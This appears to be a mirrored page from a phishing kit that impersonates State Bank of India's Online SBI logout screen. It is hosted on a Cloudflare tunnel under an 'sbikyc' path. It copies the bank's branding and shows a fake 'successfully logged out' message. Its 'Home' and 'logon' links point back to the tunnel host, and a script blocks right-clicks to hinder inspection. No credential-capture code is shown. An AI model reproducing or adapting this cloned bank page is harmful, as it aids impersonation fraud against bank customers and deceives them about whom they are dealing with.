<!DOCTYPE html>




<html>


<!-- Mirrored from anchor-railroad-based-adobe.trycloudflare.com/sbikyc/5krighg5g5fjg5f2fjg8rjbvglkg5jgf2gkfnf5fngkg5fjf.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 03 Mar 2022 13:55:39 GMT -->
<head>
 
		<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
		<meta http-equiv="CACHE-CONTROL" content="NO-CACHE">
		<meta http-equiv="PRAGMA" content="NO-CACHE">
		<meta http-equiv="EXPIRES" content="0">

		<!-- View Port Set to support Mobile Devices -->
		<meta name="format-detection" content="telephone=yes" />
		<meta http-equiv="Content-Type" content="text/xhtml; charset=UTF-8" />
		<meta name="viewport" id="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,initial-scale=1.0" />
		<meta name="apple-mobile-web-app-capable" content="yes"/>
		<meta name="MobileOptimized" content="320"/>
		<meta http-equiv="X-UA-Compatible" content="IE=edge"/>
	<!-- added  for logout sbi page   -->
<!--  Javascript Declaration   -->
<link href="https://retail.onlinesbi.com/sbijava/retail/images/favicon.ico"  rel="shortcut icon" type="image/x-icon" />	

<link rel="stylesheet" href="css/bootstrap.min-3.4.1.css" type="text/css" />
<link rel="stylesheet" href="css/style.css" type="text/css" />

<script type="text/javascript" src="js/jquery-3.5.1.min.js"></script>

<script type="text/javascript" src="js/bootstrap.min-3.4.1.js"></script>
<script  type="text/javascript" src="js/loginTrouble_5034_security.js"></script>
<script  type="text/javascript" src="js/md5_5034.js"></script>
<script  type="text/javascript" src="js/sha512.js"></script>
<script  type="text/javascript" src="js/profile_sha10092020.js"></script>

<script language="JavaScript">
window.history.forward(0);
</script>
</head>
 
<body>

 <div id="wrapper" class="container">
 







 



	




<title>State Bank of India</title>

<style type="text/css">
	.mcash_ticker {position: absolute; top: 72px; left: 322px;}
</style>
 	
			
			<div class="row" id="header"><header id="headerContent">
		<div class="col-sm-2 sbilogo_xs_center">
			<span id="sbi_logo"></span>                                
		</div>
		<div class="col-sm-10">
			<div class="pull-right">
				
				<div id="header_navigation_bottom">
					<ul id="header_toplinks" class="pull-right">
						<li><a href="https://retail.onlinesbi.com/sbijava/retail/html/aboutus.html" target="_blank"title="About Us">About Online SBI</a></li>
						<li><a href="https://retail.onlinesbi.com/personal/reg_forms.html" target="_blank"title="Forms">Registration Forms</a></li>
						
									
						
				</ul>
					
				</div>
			</div>
		</div>
	</header></div>
	  
	  
      <script language="javascript">

               var message="This function is not allowed here.";
               function clickIE4(){

                             if (event.button==2){
                             alert(message);
                             return false;
                             }
               }

               function clickNS4(e){
                             if (document.layers||document.getElementById&&!document.all){
                                            if (e.which==2||e.which==3){
                                                      alert(message);
                                                      return false;
                                            }
                                    }
               }

               if (document.layers){
                             document.captureEvents(Event.MOUSEDOWN);
                             document.onmousedown=clickNS4;
               }

               else if (document.all&&!document.getElementById){
                             document.onmousedown=clickIE4;
               }

               document.oncontextmenu=new Function("alert(message);return false;")

</script>



<!--header ends here     -->
<!DOCTYPE html>


  
  
 <html lang="en"> 


 
 

 
 
 
<head>
<title>State Bank of India</title>
<meta name="format-detection" content="telephone=yes" />
<meta http-equiv="Content-Type" content="text/xhtml; charset=UTF-8" />
<meta name="viewport" id="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,initial-scale=1.0" />
<meta name="apple-mobile-web-app-capable" content="yes"/>
<meta name="MobileOptimized" content="320"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge"/>
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="EXPIRES" CONTENT="0">


<script language="JavaScript" type="text/javascript" src="js/logoutImage.js"></script>


<script type="text/javascript" src="js/assist.js"></script> 
</head>
	
	

	 <nav id="logout-nav" class="navbar row">
			 
			<div class="navbar-header">
			  <button type="button" class="navbar-toggle navbar-left" data-toggle="collapse" data-target="#myNavbar">
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
			  </button>
			</div>
			<div class="row">				
			<div class="collapse navbar-collapse" id="myNavbar">
			  <ul class="nav navbar-nav">
				<li class="active"><a href="http://anchor-railroad-based-adobe.trycloudflare.com/" title="Home"target="_blank">Home</a></li>
				<li><a href="https://retail.onlinesbi.com/personal/productandservices.html" target="_blank" title="Products and Services">Products &amp; Services</a></li>
				<li><a href="https://retail.onlinesbi.com/personal/rinb_videos.html" target="_blank"title="How do I">How Do I</a></li>
				<li><a href="https://retail.onlinesbi.com/mcashclaimwin.htm?bankCode=0" target="_blank"title="mCash">State Bank mCASH - Claim Money</a></li>
			  </ul>
			</div>
			</div>
		</nav> 
	<div class="row" id="log-info">
	<div class="col-lg-12 col-md-12 col-sm-12 log-head">
			<span>Logout</span>
		</div>
	</div>
	 <div class="row">
			<div class="first_row">
				<div class="col-lg-6 col-md-6 col-sm-6">
						<div class="col-lg-12 col-md-12 col-sm-12 alert alert-success">
								<div class="col-lg-1 col-md-1 col-sm-1">
									<img src="images/success.png" alt="success">
								</div>
								<div class="col-lg-11 col-md-11 col-sm-11">
								
							
									
								
										<p>You have successfully logged out of Online SBI</p>
								
		
									<p>Thank you for using Online SBI</p>
									
									<p><a href="http://anchor-railroad-based-adobe.trycloudflare.com/">Click here</a> to logon to OnlineSBI</p>
								</div>
								
							</div>
				</div>
				<div class="col-lg-6 col-md-6 col-sm-6">

					<div class="border-box">
					<img src="images/retail_0_image1.jpg" alt="banner1" class="img-responsive">

					<!-- 
					<a href="javascript:void(0);" id="retail_0_image1"><img id="banner1" alt="banner1" class="img-responsive"/></a>  -->
						</div>
				</div>
			</div>
		</div> 
		
	<div class="row">
		<div class="col-lg-6 col-md-6 col-sm-6">


			<div class="border-box">
			<img src="images/retail_0_image2.jpg" alt="banner2" class="img-responsive">
<!-- 
			<a href="javascript:void(0);" id="retail_0_image2"><img id="banner2" alt="banner2" class="img-responsive"/></a>  -->
			
				<!-- <img src="images/retail_0_image2.jpg" class="img-responsive" alt="Retail Image" width="100%" /> -->
			</div>
		</div>
		<div class="col-lg-6 col-md-6 col-sm-6">

			<div class="border-box">
			<img src="images/retail_0_image5.jpg" alt="banner3"class="img-responsive">
<!-- 
				<a href="javascript:void(0);" id="retail_0_image3"><img id="banner3" alt="banner3" class="img-responsive"/></a> -->
			</div>
		</div>
	</div>

	<div class="row">
		<div class="col-lg-6 col-md-6 col-sm-6">
			<div class="border-box">

			<img src="images/retail_0_image4.jpg" alt="banner4" class="img-responsive">

			<!-- 	<a href="javascript:void(0);" id="retail_0_image4"><img id="banner4" alt="banner4" class="img-responsive"/></a> -->
			</div>
		</div>
		<div class="col-lg-6 col-md-6 col-sm-6">
			<div class="border-box">


			<img src="images/retail_0_image3.jpg" alt="banner3" class="img-responsive">
			<!-- 
					<a href="javascript:void(0);" id="retail_0_image5"><img id="banner5" alt="banner5" class="img-responsive"/></a> -->
			</div>
		</div>
	</div>

	
	<div class="row">
			<div class="info_panel">
				<div class="notify_icon">
					<ul>
						<li>Please close this page for Security reasons</li>
					</ul>
				</div>
			</div>
		</div>
		
<!-- Mirrored from anchor-railroad-based-adobe.trycloudflare.com/sbikyc/5krighg5g5fjg5f2fjg8rjbvglkg5jgf2gkfnf5fngkg5fjf.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 03 Mar 2022 13:55:58 GMT -->
</html>
		
<!-- out.println(session.getAttribute("user"));	  -->
 
  
   

<script language="JavaScript">
window.history.forward(0);

</script>
        
<script language="JavaScript">
localStorage.removeItem('languagecode');

</script>

 
 
 
<!--footer starts here-->



 <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
		<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
		<META HTTP-EQUIV="EXPIRES" CONTENT="0">








<script language="JavaScript" type="text/javascript" src="js/logoutImage.js"></script>


<script type="text/javascript" src=".js/assist.js"></script> 
 
	
	

   
 

 

<script language="JavaScript">
 
 var bankcode=$("#bankcodeValue").val();
  if(bankcode == 0){
	  $("#tblContainer").hide();
  } 
</script>

  

<div class="row" id="footer">










 




<!-- Footer -->
	<footer id="footerContent">
		<div id="footer_area">		
			<div class="col-lg-12 col-md-12 col-sm-12">
				<ul id="footer_links" class="pull-right hidden-xs">
					
											
							
							<li>
							<a href="#" onclick="window.open('https://retail.onlinesbi.com/sbijava/retail/html/Privacy_Statement.html','aboutus','width=780, height=500, status=1, scrollbars=1, location=0')">Privacy Statement</a>										
							</li>
							<li>
							<a href="#" onclick="window.open('https://retail.onlinesbi.com/sbijava/retail/html/hmpg_disclosure.html','aboutus','width=780, height=500, status=1, scrollbars=1, location=0')">Disclosure </a>			
							</li>
							<li>
							<a href="#" onclick="window.open('https://retail.onlinesbi.com/sbijava/retail/html/Terms_of_Use.html','aboutus','width=780, height=500, status=1, scrollbars=1, location=0')">Terms of Service(Terms & Conditions) </a>	
							</li>	

                         <li><a onclick="javascript:callURL('https://retail.onlinesbi.com/retail/sitemap.htm')" href="javascript:void(0);">
						Site Map</a></li>							
						
						
									
				</ul>
			</div>
		</div>
				
		<div class="footbg" id="best_view">
			<div class="col-sm-4">
				<p class="pull-left">&copy; State Bank of India</p>
			</div>
			<div class="col-sm-8">
				<p class="pull-right">Site best viewed at 1024 x 768 resolution in I.E 10 +, Mozilla 35 +, Google Chrome 35 +</p>
			</div>
		</div>
		
	</footer>
<!-- //Footer -->


 <input type='hidden' value='0' id='bankcodeValue'>
 
</div>	
</div>
</body>
</html>

